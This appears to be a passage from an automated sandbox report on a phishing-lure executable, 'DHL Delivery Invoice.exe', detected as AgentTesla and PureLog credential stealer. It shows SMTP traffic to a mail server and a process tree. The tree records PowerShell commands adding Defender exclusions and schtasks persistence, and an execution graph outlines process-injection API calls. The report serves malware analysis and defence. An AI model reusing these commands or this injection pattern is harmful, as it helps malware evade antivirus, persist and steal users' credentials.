                                                                                                                                Nov 27, 2024 19:18:15.195240021 CET50026587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:18:15.650046110 CET5875002677.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:19.472358942 CET5875002777.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net Ok 1732731499-JIeJur0Om8c0
                                                                                                                                Nov 27, 2024 19:18:19.473581076 CET50027587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:19.943002939 CET5875002777.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:19.943145990 CET50027587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:18:20.601798058 CET5875002777.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:35.948221922 CET5875002877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net Ok 1732731515-ZIemYm0Or0U0
                                                                                                                                Nov 27, 2024 19:18:35.948364019 CET50028587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:36.427022934 CET5875002877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:36.434393883 CET50028587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:18:36.912491083 CET5875002877.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:39.864389896 CET5875002977.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-19.klg.yp-c.yandex.net Ok 1732731519-dIeAtn0OfOs0
                                                                                                                                Nov 27, 2024 19:18:39.864540100 CET50029587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:40.324963093 CET5875002977.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-19.klg.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:40.325102091 CET50029587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:18:40.792325020 CET5875002977.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:43.223130941 CET5875003077.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net Ok 1732731522-gIeHVZ0OiGk0
                                                                                                                                Nov 27, 2024 19:18:43.226536989 CET50030587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:43.687553883 CET5875003077.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:43.687733889 CET50030587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:18:44.147063971 CET5875003077.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:19:05.344616890 CET5875003177.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-38.myt.yp-c.yandex.net Ok 1732731545-4JeFqd0OlKo0
                                                                                                                                Nov 27, 2024 19:19:05.350455046 CET50031587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:19:05.806034088 CET5875003177.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-38.myt.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:19:05.806389093 CET50031587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:19:06.259654045 CET5875003177.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:19:14.631259918 CET5875003277.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-69.iva.yp-c.yandex.net Ok 1732731554-EJejLW0OrGk0
                                                                                                                                Nov 27, 2024 19:19:14.634655952 CET50032587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:19:15.086268902 CET5875003277.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-69.iva.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:19:15.086508989 CET50032587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:19:15.534303904 CET5875003277.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:19:22.184061050 CET5875003377.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net Ok 1732731561-LJeMep0OdOs0
                                                                                                                                Nov 27, 2024 19:19:22.184243917 CET50033587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:19:22.644680023 CET5875003377.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:19:22.644833088 CET50033587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:19:22.949794054 CET5875003477.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net Ok 1732731562-MJeM5p0MnmI0
                                                                                                                                Nov 27, 2024 19:19:22.950483084 CET50034587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:19:23.098561049 CET5875003377.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:19:23.395632029 CET5875003477.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:19:23.395801067 CET50034587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:19:23.843940020 CET5875003477.88.21.158192.168.2.4220 Go ahead

                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:13:15:10
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                                                                                                                                Imagebase:0x6a0000
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5 hash:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1843513866.00000000079A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1828601395.0000000004318000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:2
                                                                                                                                Start time:13:15:12
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                                                                                                                                Imagebase:0xb70000
                                                                                                                                File size:433'152 bytes
                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:3
                                                                                                                                Start time:13:15:12
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:4
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                                                                                                                                Imagebase:0xb70000
                                                                                                                                File size:433'152 bytes
                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:5
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:6
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp"
                                                                                                                                Imagebase:0x8b0000
                                                                                                                                File size:187'904 bytes
                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:7
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:8
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                                                                                                                                Imagebase:0x300000
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5 hash:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                                                                                                                                Imagebase:0x470000
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5 hash:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                Imagebase:0xc40000
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5 hash:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 53%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:11
                                                                                                                                Start time:13:15:16
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                Imagebase:0x7ff693ab0000
                                                                                                                                File size:496'640 bytes
                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:12
                                                                                                                                Start time:13:15:18
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp"
                                                                                                                                Imagebase:0x8b0000
                                                                                                                                File size:187'904 bytes
                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:13
                                                                                                                                Start time:13:15:18
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:14
                                                                                                                                Start time:13:15:18
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                                                                                                                                Imagebase:0xd40000
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5 hash:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4254539671.0000000000437000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Has exited:false

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:14.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:3.4%
                                                                                                                                  Total number of Nodes:175
                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                  execution_graph 37104 9717540 37105 971757a 37104->37105 37106 97175f6 37105->37106 37107 971760b 37105->37107 37112 97157dc 37106->37112 37108 97157dc 2 API calls 37107->37108 37111 971761a 37108->37111 37113 97157e7 37112->37113 37114 9717601 37113->37114 37116 9718368 37113->37116 37122 9717f54 37116->37122 37118 971838f 37118->37114 37120 97183bd CreateIconFromResourceEx 37121 9718436 37120->37121 37121->37114 37123 97183b8 CreateIconFromResourceEx 37122->37123 37125 9718382 37123->37125 37125->37118 37125->37120 37126 9716d00 37127 9716d05 DrawTextExW 37126->37127 37129 9716da6 37127->37129 37130 98310f2 37131 9831126 37130->37131 37132 983111d 37130->37132 37135 9833788 37132->37135 37154 983378c 37132->37154 37136 98337a2 37135->37136 37140 98337c6 37136->37140 37173 9833adc 37136->37173 37179 9833edd 37136->37179 37187 9833f9e 37136->37187 37195 983403f 37136->37195 37203 98341df 37136->37203 37207 98343f8 37136->37207 37211 9833d1a 37136->37211 37215 9833d55 37136->37215 37219 9833e2c 37136->37219 37223 983414d 37136->37223 37227 983418d 37136->37227 37231 9833dae 37136->37231 37235 98340ca 37136->37235 37239 983410b 37136->37239 37244 98340a0 37136->37244 37249 983427c 37136->37249 37140->37131 37155 98337a2 37154->37155 37156 98337c6 37155->37156 37157 98340a0 2 API calls 37155->37157 37158 983410b 2 API calls 37155->37158 37159 98340ca 2 API calls 37155->37159 37160 9833dae 2 API calls 37155->37160 37161 983418d 2 API calls 37155->37161 37162 983414d 2 API calls 37155->37162 37163 9833e2c 2 API calls 37155->37163 37164 9833d55 2 API calls 37155->37164 37165 9833d1a 2 API calls 37155->37165 37166 98343f8 2 API calls 37155->37166 37167 98341df 2 API calls 37155->37167 37168 983403f 4 API calls 37155->37168 37169 9833f9e 4 API calls 37155->37169 37170 9833edd 4 API calls 37155->37170 37171 9833adc 2 API calls 37155->37171 37172 983427c 2 API calls 37155->37172 37156->37131 37157->37156 37158->37156 37159->37156 37160->37156 37161->37156 37162->37156 37163->37156 37164->37156 37165->37156 37166->37156 37167->37156 37168->37156 37169->37156 37170->37156 37171->37156 37172->37156 37175 9833b0b 37173->37175 37174 9833ba6 37174->37140 37175->37174 37254 9830cd0 37175->37254 37258 9830cc4 37175->37258 37180 9833ede 37179->37180 37262 9830a48 37180->37262 37266 9830a40 37180->37266 37181 98343df 37181->37140 37182 9833d10 37182->37140 37182->37181 37270 97efc60 37182->37270 37274 97efc68 37182->37274 37188 9833ede 37187->37188 37191 9830a40 WriteProcessMemory 37188->37191 37192 9830a48 WriteProcessMemory 37188->37192 37189 98343df 37189->37140 37190 9833d10 37190->37140 37190->37189 37193 97efc68 ResumeThread 37190->37193 37194 97efc60 ResumeThread 37190->37194 37191->37190 37192->37190 37193->37190 37194->37190 37196 9834045 37195->37196 37199 9830a40 WriteProcessMemory 37196->37199 37200 9830a48 WriteProcessMemory 37196->37200 37197 98343df 37197->37140 37198 9833d10 37198->37140 37198->37197 37201 97efc68 ResumeThread 37198->37201 37202 97efc60 ResumeThread 37198->37202 37199->37198 37200->37198 37201->37198 37202->37198 37205 9830a40 WriteProcessMemory 37203->37205 37206 9830a48 WriteProcessMemory 37203->37206 37204 983420d 37205->37204 37206->37204 37209 9830a40 WriteProcessMemory 37207->37209 37210 9830a48 WriteProcessMemory 37207->37210 37208 983441c 37209->37208 37210->37208 37212 9833d10 37211->37212 37212->37140 37213 97efc68 ResumeThread 37212->37213 37214 97efc60 ResumeThread 37212->37214 37213->37212 37214->37212 37278 9830470 37215->37278 37282 9830478 37215->37282 37216 9833d6f 37216->37140 37220 9833d10 37219->37220 37220->37140 37221 97efc68 ResumeThread 37220->37221 37222 97efc60 ResumeThread 37220->37222 37221->37220 37222->37220 37224 9833d10 37223->37224 37224->37140 37225 97efc68 ResumeThread 37224->37225 37226 97efc60 ResumeThread 37224->37226 37225->37224 37226->37224 37228 9833d10 37227->37228 37228->37140 37228->37227 37229 97efc68 ResumeThread 37228->37229 37230 97efc60 ResumeThread 37228->37230 37229->37228 37230->37228 37232 9833d10 37231->37232 37232->37140 37232->37231 37233 97efc68 ResumeThread 37232->37233 37234 97efc60 ResumeThread 37232->37234 37233->37232 37234->37232 37286 9830b31 37235->37286 37290 9830b38 37235->37290 37236 98340ec 37240 98340a3 37239->37240 37294 9830981 37240->37294 37298 9830988 37240->37298 37241 98346bd 37245 98340b5 37244->37245 37247 9830981 VirtualAllocEx 37245->37247 37248 9830988 VirtualAllocEx 37245->37248 37246 98346bd 37247->37246 37248->37246 37250 98340a3 37249->37250 37252 9830981 VirtualAllocEx 37250->37252 37253 9830988 VirtualAllocEx 37250->37253 37251 98346bd 37251->37251 37252->37251 37253->37251 37255 9830d59 37254->37255 37255->37255 37256 9830ebe CreateProcessA 37255->37256 37257 9830f1b 37256->37257 37259 9830d59 37258->37259 37259->37259 37260 9830ebe CreateProcessA 37259->37260 37261 9830f1b 37260->37261 37263 9830a90 WriteProcessMemory 37262->37263 37265 9830ae7 37263->37265 37265->37182 37267 9830a90 WriteProcessMemory 37266->37267 37269 9830ae7 37267->37269 37269->37182 37271 97efc68 ResumeThread 37270->37271 37273 97efcd9 37271->37273 37273->37182 37275 97efca8 ResumeThread 37274->37275 37277 97efcd9 37275->37277 37277->37182 37279 98304bd Wow64SetThreadContext 37278->37279 37281 9830505 37279->37281 37281->37216 37283 98304bd Wow64SetThreadContext 37282->37283 37285 9830505 37283->37285 37285->37216 37287 9830b83 ReadProcessMemory 37286->37287 37289 9830bc7 37287->37289 37289->37236 37291 9830b83 ReadProcessMemory 37290->37291 37293 9830bc7 37291->37293 37293->37236 37295 98309c8 VirtualAllocEx 37294->37295 37297 9830a05 37295->37297 37297->37241 37299 98309c8 VirtualAllocEx 37298->37299 37301 9830a05 37299->37301 37301->37241 37070 2aa9c48 37071 2aa9c5f 37070->37071 37072 2aa9d35 37071->37072 37074 2aa9d60 37071->37074 37075 2aa9d82 37074->37075 37076 2aa9d8d 37075->37076 37078 2aa9e59 37075->37078 37076->37071 37079 2aa9e7d 37078->37079 37083 2aaa360 37079->37083 37087 2aaa370 37079->37087 37085 2aaa397 37083->37085 37084 2aaa474 37085->37084 37091 2aa9fbc 37085->37091 37088 2aaa397 37087->37088 37089 2aa9fbc CreateActCtxA 37088->37089 37090 2aaa474 37088->37090 37089->37090 37092 2aab400 CreateActCtxA 37091->37092 37094 2aab4c3 37092->37094 37095 9834a68 37096 9834bf3 37095->37096 37097 9834a8e 37095->37097 37097->37096 37100 9834ce0 PostMessageW 37097->37100 37102 9834ce8 PostMessageW 37097->37102 37101 9834d54 37100->37101 37101->37097 37103 9834d54 37102->37103 37103->37097

                                                                                                                                  Executed Functions

                                                                                                                                  Function 097E2E58 Relevance: 8.5, Strings: 6, Instructions: 1022COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
